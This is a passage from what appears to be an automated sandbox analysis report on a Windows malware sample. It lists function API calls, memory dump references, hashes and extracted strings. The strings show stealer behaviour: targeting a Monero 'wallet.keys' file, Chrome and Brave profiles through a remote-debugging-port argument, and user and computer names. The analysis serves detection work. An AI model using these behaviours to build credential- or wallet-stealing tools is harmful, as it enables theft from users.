                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 5db800e5f1bc8fe0de44aad9e9acee5ab66351f28e3e310c535387f9be819040
                                  • Instruction ID: b057d16a7999ff5e2110e87340f9a9ccfae810a0345366e60ab21014f2d5d8c7
                                  • Opcode Fuzzy Hash: 5db800e5f1bc8fe0de44aad9e9acee5ab66351f28e3e310c535387f9be819040
                                  • Instruction Fuzzy Hash: EDE0CDB098530CFBE7656B90ED0EB0C767C9B04B05F100194F708B61C4C6F425809758
                                  Function 00E610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E610B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E610F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: d97549ce63dd7605d32b2b4282689ee39ea7bd85e4b17878a31ade35f064236e
                                  • Instruction ID: 104f1f034dd6a1b12c8ea28a0814489f99cf51d6062c8930c467d44cb792c87f
                                  • Opcode Fuzzy Hash: d97549ce63dd7605d32b2b4282689ee39ea7bd85e4b17878a31ade35f064236e
                                  • Instruction Fuzzy Hash: 75F0E2B1681208BBEB289AA4AC59FAFB7D8E705B44F301458F904E3280D5719E008BA0
                                  Function 00E61190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E77A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E77AA0
                                    • Part of subcall function 00E77A70: RtlAllocateHeap.NTDLL(00000000), ref: 00E77AA7
                                    • Part of subcall function 00E77A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00E77ABF
                                    • Part of subcall function 00E779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E611B7), ref: 00E77A10
                                    • Part of subcall function 00E779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E77A17
                                    • Part of subcall function 00E779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E77A2F
                                  • ExitProcess.KERNEL32 ref: 00E611C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: f7470d5b1df232ce31688a089f7ec7779843bb5c75e1cf6d50b77caf78fed9ac
                                  • Instruction ID: a892497331c399fcc369c2566904ff5aa43a80048353d36e8d17e4da853ec416
                                  • Opcode Fuzzy Hash: f7470d5b1df232ce31688a089f7ec7779843bb5c75e1cf6d50b77caf78fed9ac
                                  • Instruction Fuzzy Hash: 93E012FA94430153DA2473B47D1BB1B32CC5B2534EF046464FA1CB214AFD65E9508365

                                  Non-executed Functions

                                  Function 00E6BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00E80B32,00E80B2F,00000000,?,?,?,00E81450,00E80B2E), ref: 00E6BEC5
                                  • StrCmpCA.SHLWAPI(?,00E81454), ref: 00E6BF33
                                  • StrCmpCA.SHLWAPI(?,00E81458), ref: 00E6BF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6C8A9
                                  • FindClose.KERNEL32(000000FF), ref: 00E6C8BB
                                  Strings
                                  • \Brave\Preferences, xrefs: 00E6C1C1
                                  • Google Chrome, xrefs: 00E6C6F8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E6C534
                                  • Brave, xrefs: 00E6C0E8
                                  • Preferences, xrefs: 00E6C104
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E6C495
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00E6C3B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 2c099dddd63f1a0a64d12085dadf19df8a76b402c3511e9c53615622886d7d03
                                  • Instruction ID: cfb7a17b44ddd48f8a6a735250df20f28506a100ef51202a222c9aa7b015ca96
                                  • Opcode Fuzzy Hash: 2c099dddd63f1a0a64d12085dadf19df8a76b402c3511e9c53615622886d7d03
                                  • Instruction Fuzzy Hash: 7D5243725001089BCB24FB60DD96EEE73BDAF94344F4495B9B50EB6095EE306B48CF62
                                  Function 00E73B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E73B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E73B33
                                  • lstrcat.KERNEL32(?,?), ref: 00E73B85
                                  • StrCmpCA.SHLWAPI(?,00E80F58), ref: 00E73B97
                                  • StrCmpCA.SHLWAPI(?,00E80F5C), ref: 00E73BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E73EB7
                                  • FindClose.KERNEL32(000000FF), ref: 00E73ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 1e298c88c5e982cb4634908f9d9d5289af7a1a1adaf8566c9d8eadd144687cff
                                  • Instruction ID: 5db6c105ca91698621debe07fd4c9f97af97e3512248c2db8a71e4bef5607ca0
                                  • Opcode Fuzzy Hash: 1e298c88c5e982cb4634908f9d9d5289af7a1a1adaf8566c9d8eadd144687cff
                                  • Instruction Fuzzy Hash: BCA132B2A002189BDB74EF64DC85FEE7379BB45300F048598F61DA6185EB709B88CF61
                                  Function 00E74B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E74B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E74B93
                                  • StrCmpCA.SHLWAPI(?,00E80FC4), ref: 00E74BC1
                                  • StrCmpCA.SHLWAPI(?,00E80FC8), ref: 00E74BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E74DCD
                                  • FindClose.KERNEL32(000000FF), ref: 00E74DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: ea72fa88a8b019f6e05d2d73349b3812a46028b642bfd78f65b23ee0ec7961c5
                                  • Instruction ID: ac53955df2329fcac2f48eae5624b2b588dfbbbc33294f8f760d6778ec003a30
                                  • Opcode Fuzzy Hash: ea72fa88a8b019f6e05d2d73349b3812a46028b642bfd78f65b23ee0ec7961c5
                                  • Instruction Fuzzy Hash: BE613BB2500219ABDB74EBA0DC45FEA737CBB48704F0485D8F61DA6185EB709B88CF91
                                  Function 00E747C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E747D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E747D7
                                  • wsprintfA.USER32 ref: 00E747F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E7480D
                                  • StrCmpCA.SHLWAPI(?,00E80FAC), ref: 00E7483B
                                  • StrCmpCA.SHLWAPI(?,00E80FB0), ref: 00E74851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E748DB
                                  • FindClose.KERNEL32(000000FF), ref: 00E748F0
                                  • lstrcat.KERNEL32(?,0173E3B8), ref: 00E74915
                                  • lstrcat.KERNEL32(?,0173D5E0), ref: 00E74928
                                  • lstrlen.KERNEL32(?), ref: 00E74935
                                  • lstrlen.KERNEL32(?), ref: 00E74946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: c897eebeaafd62f4e9f9989b72546e96a80f9af2e629bc6ae3c0c6a780ee2d65
                                  • Instruction ID: 38585e93cb9351ee30e85349826d862e9e41d4db1ea1452b4e55bc9d762d13f3
                                  • Opcode Fuzzy Hash: c897eebeaafd62f4e9f9989b72546e96a80f9af2e629bc6ae3c0c6a780ee2d65
                                  • Instruction Fuzzy Hash: 545158B6540218ABDB64EB70DC89FED73BCAB58300F409598F61DA6184EB709BC4CF91
                                  Function 00E740F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E74113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E7412A
                                  • StrCmpCA.SHLWAPI(?,00E80F94), ref: 00E74158
                                  • StrCmpCA.SHLWAPI(?,00E80F98), ref: 00E7416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E742BC
                                  • FindClose.KERNEL32(000000FF), ref: 00E742D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 918fe11fccb5d4210f46776ae5bc0ab80a1beb9074cbfb0456231902de61c3a9
                                  • Instruction ID: 0811601c51aeb9a8e0264f970f8101c0c04592069098767c457efac60cf0f300
                                  • Opcode Fuzzy Hash: 918fe11fccb5d4210f46776ae5bc0ab80a1beb9074cbfb0456231902de61c3a9
                                  • Instruction Fuzzy Hash: F05135F6500218ABCB28EBB0DD45EEA737CBB54300F448598B61DA6085DB719BC9CF50
                                  Function 00E6EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00E6EE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00E6EE55
                                  • StrCmpCA.SHLWAPI(?,00E81630), ref: 00E6EEAB
                                  • StrCmpCA.SHLWAPI(?,00E81634), ref: 00E6EEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6F3AE
                                  • FindClose.KERNEL32(000000FF), ref: 00E6F3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 8a512eced1e6f834dd122dd6d0cec02b6875d52a2a4453c792b3921f8c480965
                                  • Instruction ID: 82e5b1a2f357ef87297e8e2b065c47c7c67a1c261c10320c5e51329bd19add4a
                                  • Opcode Fuzzy Hash: 8a512eced1e6f834dd122dd6d0cec02b6875d52a2a4453c792b3921f8c480965
                                  • Instruction Fuzzy Hash: 42E10F729111189ADB55FB60DC62EEE73BDAF94300F4495F9B40E72092EE306B89CF52
                                  Function 00EA0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
